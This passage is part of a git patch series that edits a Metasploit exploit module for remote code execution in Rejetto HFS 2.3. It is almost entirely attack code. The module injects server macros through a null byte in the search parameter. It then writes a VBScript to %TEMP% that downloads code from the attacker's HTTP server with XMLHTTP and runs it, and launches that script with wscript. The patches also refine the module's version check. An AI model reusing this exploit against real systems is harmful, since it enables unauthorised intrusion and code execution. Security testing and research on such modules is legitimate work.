2014 12:03:16 -0500 Subject: [PATCH 15/16] Improve check method --- .../exploits/windows/http/rejetto_hfs_exec.rb | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 8b27856801..aaedbb7d20 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -60,8 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res && res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/ - return Exploit::CheckCode::Detected + if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/ + version = $1 + if Gem::Version.new(version) <= Gem::Version.new("2.3") + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end else return Exploit::CheckCode::Safe end @@ -98,10 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending a malicious request to #{target_uri.path}") payloads.each do |payload| - send_request_raw({ + res = send_request_raw({ 'method' => 'GET', 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" - }) + }) + if res + print_status("#{res.code}\n#{res.body.to_s}") + end end register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") end From 98b69e095c84fdf91956d412aa311067ad022767 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 12:12:00 -0500 Subject: [PATCH 16/16] Use %TEMP% and update ranking --- .../exploits/windows/http/rejetto_hfs_exec.rb | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index aaedbb7d20..4311617bd6 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer @@ -49,7 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The path of the web application', '/']), - OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), ], self.class) end @@ -86,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote file_name = rand_text_alpha(rand(10)+5) file_ext = '.vbs' file_full_name = file_name + file_ext + vbs_path = "%TEMP%\\#{file_full_name}" vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a" vbs_code << "On Error Resume Next\x0d\x0a" @@ -97,27 +97,24 @@ class Metasploit3 < Msf::Exploit::Remote vbs_code << "Execute x.responseText" payloads = [ - "save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}", - "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}" + "save|#{vbs_path}|#{vbs_code}", + "exec|wscript.exe //B //NOLOGO #{vbs_path}" ] print_status("Sending a malicious request to #{target_uri.path}") payloads.each do |payload| - res = send_request_raw({ + send_request_raw({ 'method' => 'GET', 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" }) - if res - print_status("#{res.code}\n#{res.body.to_s}") - end end - register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") + register_file_for_cleanup(vbs_path) end def exploit begin Timeout.timeout(datastore['HTTPDELAY']) { super } - rescue Timeout::Error + rescue Timeout::Error # When the server stops due to our timeout, this is raised end end